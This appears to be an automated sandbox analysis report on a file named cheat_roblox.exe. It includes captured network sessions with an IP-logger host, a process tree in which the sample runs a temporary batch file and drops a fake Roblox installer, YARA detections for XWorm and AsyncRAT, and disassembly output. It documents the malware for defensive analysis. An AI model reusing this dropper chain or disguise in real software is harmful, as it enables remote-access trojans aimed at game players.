                                                                                                                2024-07-29 22:49:20 UTC351OUTGET /favicon.ico HTTP/1.1
                                                                                                                Host: cdn.iplogger.org
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:20 UTC753INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 29 Jul 2024 22:49:20 GMT
                                                                                                                Content-Type: image/x-icon
                                                                                                                Content-Length: 2833
                                                                                                                Connection: close
                                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                etag: "629f3a26-b11"
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                Cache-Control: max-age=14400
                                                                                                                CF-Cache-Status: HIT
                                                                                                                Age: 6038
                                                                                                                Accept-Ranges: bytes
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gg02hedGd65nqLSX8kn35HnUlrkQE4NFTWiaws6euWErw%2F1nJDBB6mKmLdxgnE45ETPQFJrRXBDeeJWg3W3yCfRy%2BtOBtjpGLHqXr7tXuF7u2T2ydigZtOarNddWytVXzDGJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ab0a95dc93c43b1-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-07-29 22:49:20 UTC616INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                                                2024-07-29 22:49:20 UTC1369INData Raw: 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a 67 29 1a 2c fb 23 f1 45 c0 2d 88 05 71 1b
                                                                                                                Data Ascii: !8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFzg),#E-q
                                                                                                                2024-07-29 22:49:20 UTC848INData Raw: 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12 f7 21 a7 61 99 b9 3a 2d 32 87 80 23 26 c6
                                                                                                                Data Ascii: x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?!a:-2#&


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.949745184.28.90.27443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: identity
                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                Host: fs.microsoft.com
                                                                                                                2024-07-29 22:49:20 UTC467INHTTP/1.1 200 OK
                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                Content-Type: application/octet-stream
                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Server: ECAcc (chd/073B)
                                                                                                                X-CID: 11
                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                Cache-Control: public, max-age=202425
                                                                                                                Date: Mon, 29 Jul 2024 22:49:20 GMT
                                                                                                                Connection: close
                                                                                                                X-CID: 2


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.949747184.28.90.27443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: identity
                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Range: bytes=0-2147483646
                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                Host: fs.microsoft.com
                                                                                                                2024-07-29 22:49:21 UTC515INHTTP/1.1 200 OK
                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                Content-Type: application/octet-stream
                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                X-CID: 11
                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                Cache-Control: public, max-age=202467
                                                                                                                Date: Mon, 29 Jul 2024 22:49:21 GMT
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                X-CID: 2
                                                                                                                2024-07-29 22:49:21 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.96111920.3.187.198443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:34 UTC142OUTGET /clientwebservice/ping HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: DNS resiliency checker/1.0
                                                                                                                Host: fe3cr.delivery.mp.microsoft.com
                                                                                                                2024-07-29 22:49:35 UTC234INHTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Expires: -1
                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                X-Powered-By: ASP.NET
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:34 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.96112152.165.165.26443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:38 UTC124OUTGET /sls/ping HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: DNS resiliency checker/1.0
                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                2024-07-29 22:49:38 UTC318INHTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Expires: -1
                                                                                                                MS-CV: N9wrgWCZWUK0l8Do.0
                                                                                                                MS-RequestId: 65af64a9-fafb-4bdd-9aea-685a5d85697a
                                                                                                                MS-CorrelationId: 10bc97bb-1c4f-47da-b96b-ca49aa1cbd3e
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:38 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.96112240.127.169.103443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:40 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                2024-07-29 22:49:41 UTC560INHTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                MS-CorrelationId: e192b5ee-83f6-4b4e-bed4-21e5c9f365d6
                                                                                                                MS-RequestId: 0ef5a365-b3b2-4c6b-8e18-659bab1f9471
                                                                                                                MS-CV: xQYACvxTi06B+S3z.0
                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:40 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 24490
                                                                                                                2024-07-29 22:49:41 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                2024-07-29 22:49:41 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.96112340.127.169.103443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:42 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                2024-07-29 22:49:42 UTC560INHTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                MS-CorrelationId: 7b4ebea3-22b8-4b52-bedc-35b547b8898f
                                                                                                                MS-RequestId: 29373da9-d71f-461b-a498-259ad73ecc9e
                                                                                                                MS-CV: /FFJZc7u0ECKjf+S.0
                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:41 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 30005
                                                                                                                2024-07-29 22:49:42 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                2024-07-29 22:49:42 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:18:48:58
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\cheat_roblox.exe"
                                                                                                                Imagebase:0x7ff6e7e10000
                                                                                                                File size:2'675'335 bytes
                                                                                                                MD5 hash:D49B1A211CE49BED3E766471501819C6
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:2
                                                                                                                Start time:18:48:59
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
                                                                                                                Imagebase:0x7ff7c8fd0000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:3
                                                                                                                Start time:18:48:59
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:18:48:59
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe"
                                                                                                                Imagebase:0xdf0000
                                                                                                                File size:5'720'984 bytes
                                                                                                                MD5 hash:27469372591B14FF1C57654FACB5E020
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:5
                                                                                                                Start time:18:49:09
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:cmd
                                                                                                                Imagebase:0x7ff7c8fd0000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:6
                                                                                                                Start time:18:49:09
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:8
                                                                                                                Start time:18:49:10
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
                                                                                                                Imagebase:0x7ff6b2cb0000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:10
                                                                                                                Start time:18:49:12
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,10681821834965854716,2612252034697891369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                Imagebase:0x7ff6b2cb0000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:12.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:27%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:23
                                                                                                                  execution_graph 25382 7ff6e7e4bf2c 25389 7ff6e7e4bc34 25382->25389 25394 7ff6e7e4d440 35 API calls 3 library calls 25389->25394 25391 7ff6e7e4bc3f 25395 7ff6e7e4d068 35 API calls abort 25391->25395 25394->25391 26271 7ff6e7e420f0 26272 7ff6e7e42106 _com_error::_com_error 26271->26272 26277 7ff6e7e44078 26272->26277 26274 7ff6e7e42117 26282 7ff6e7e41900 26274->26282 26278 7ff6e7e44097 26277->26278 26279 7ff6e7e440b4 RtlPcToFileHeader 26277->26279 26278->26279 26280 7ff6e7e440db RaiseException 26279->26280 26281 7ff6e7e440cc 26279->26281 26280->26274 26281->26280 26308 7ff6e7e41558 26282->26308 26285 7ff6e7e4198b 26286 7ff6e7e41868 DloadReleaseSectionWriteAccess 6 API calls 26285->26286 26287 7ff6e7e41998 RaiseException 26286->26287 26288 7ff6e7e41bb5 26287->26288 26289 7ff6e7e41abd 26292 7ff6e7e41b85 26289->26292 26295 7ff6e7e41b1b GetProcAddress 26289->26295 26290 7ff6e7e419b4 26290->26289 26291 7ff6e7e41a3d LoadLibraryExA 26290->26291 26290->26292 26293 7ff6e7e41aa9 26290->26293 26291->26293 26294 7ff6e7e41a54 GetLastError 26291->26294 26316 7ff6e7e41868 26292->26316 26293->26289 26298 7ff6e7e41ab4 FreeLibrary 26293->26298 26296 7ff6e7e41a69 26294->26296 26297 7ff6e7e41a7e 26294->26297 26295->26292 26301 7ff6e7e41b30 GetLastError 26295->26301 26296->26293 26296->26297 26300 7ff6e7e41868 DloadReleaseSectionWriteAccess 6 API calls 26297->26300 26298->26289 26302 7ff6e7e41a8b RaiseException 26300->26302 26303 7ff6e7e41b45 26301->26303 26302->26288 26303->26292 26304 7ff6e7e41868 DloadReleaseSectionWriteAccess 6 API calls 26303->26304 26305 7ff6e7e41b67 RaiseException 26304->26305 26306 7ff6e7e41558 _com_raise_error 6 API calls 26305->26306 26307 7ff6e7e41b81 26306->26307 26307->26292 26309 7ff6e7e4156e 26308->26309 26315 7ff6e7e415d3 26308->26315 26324 7ff6e7e41604 26309->26324 26312 7ff6e7e415ce 26314 7ff6e7e41604 DloadReleaseSectionWriteAccess 3 API calls 26312->26314 26314->26315 26315->26285 26315->26290 26317 7ff6e7e41878 26316->26317 26323 7ff6e7e418d1 26316->26323 26318 7ff6e7e41604 DloadReleaseSectionWriteAccess 3 API calls 26317->26318 26319 7ff6e7e4187d 26318->26319 26320 7ff6e7e418cc 26319->26320 26321 7ff6e7e417d8 DloadProtectSection 3 API calls 26319->26321 26322 7ff6e7e41604 DloadReleaseSectionWriteAccess 3 API calls 26320->26322 26321->26320 26322->26323 26323->26288 26325 7ff6e7e4161f 26324->26325 26326 7ff6e7e41573 26324->26326 26325->26326 26327 7ff6e7e41624 GetModuleHandleW 26325->26327 26326->26312 26331 7ff6e7e417d8 26326->26331 26328 7ff6e7e4163e GetProcAddress 26327->26328 26330 7ff6e7e41639 26327->26330 26329 7ff6e7e41653 GetProcAddress 26328->26329 26328->26330 26329->26330 26330->26326 26334 7ff6e7e417fa DloadProtectSection 26331->26334 26332 7ff6e7e41802 26332->26312 26333 7ff6e7e4183a VirtualProtect 26333->26332 26334->26332 26334->26333 26336 7ff6e7e416a4 